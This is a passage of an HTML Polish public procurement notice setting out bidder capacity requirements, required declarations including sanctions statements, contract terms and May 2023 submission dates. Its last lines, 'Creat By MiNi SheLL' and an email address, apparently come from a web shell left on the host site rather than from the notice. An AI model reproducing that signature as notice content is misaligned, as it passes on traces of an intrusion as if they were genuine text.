o udzielenie zamówienia warunek ten podlega<br/>sumowaniu tzn. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą spełniać warunek łącznie.<br/>W przypadku złożenia oferty przez Wykonawcę, który polega na sytuacji ekonomicznej lub finansowej podmiotów udostępniających<br/>zasoby, na zasadach określonych w art. 118 ustawy Pzp, warunek ten podlega sumowaniu, tzn. Wykonawca wspólnie<br/>z podmiotem udostępniającym zasoby muszą spełniać warunek łącznie.<br/>1.2. na potwierdzenie zdolności technicznej lub zawodowej Wykonawca zobowiązany jest przedłożyć Zamawiającemu:<br/>1.2.1. wykaz usług, o których mowa w Dziale VIII punkt 2.4. wykonanych lub<br/>w przypadku świadczeń okresowych lub ciągłych wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania<br/>ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonanych wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, sporządzonym według<br/>załącznika nr 5 do SWZ oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy, Wzór oświadczenia dot. zobowiązania podmiotu udostępniającego zasoby;<br/>Załącznik nr 8 - Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art.<br/>117 ust. 4 ustawy Pzp;<br/>Załącznik nr 9 - Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej<br/>grupy kapitałowej;<br/>Załącznik nr 10 - Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu składane na<br/>podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>Załącznik nr 11 - Oświadczenie w zakresie art. 5 k Rozporządzenia 833/2014 z dnie 31 lipca wykaz 2014 r. dotyczącego<br/>środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 229 z<br/>31.7.2014, str. 1) w brzmieniu nadanym rozporządzeniem 2022/576. Dokumenty, z których wynika prawo do podpisania<br/>oferty, odpowiednie pełnomocnictwa(jeżeli dotyczy), Uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa(jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie potwierdzające brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu, w jakim każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia i spełnienie<br/>warunków składa każdy z Wykonawców wspólnie ubiegających się o zamówienia. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołącza do oferty oświadczenie , o którym mowa w art. 117 ust. 4, z którego wynika które usługi<br/>wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 8 do SWZ. Pozostałe informacje zawiera SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy w granicach unormowania art. 454 i art. 455 ustawy Pzp. we wskazanym we wzorze umowy, stanowiącym załącznik nr 2 do SWZ, zakresie i warunkach. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę przygotowaną, zgodnie z opisem Działu XIV SWZ, za pośrednictwem Platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com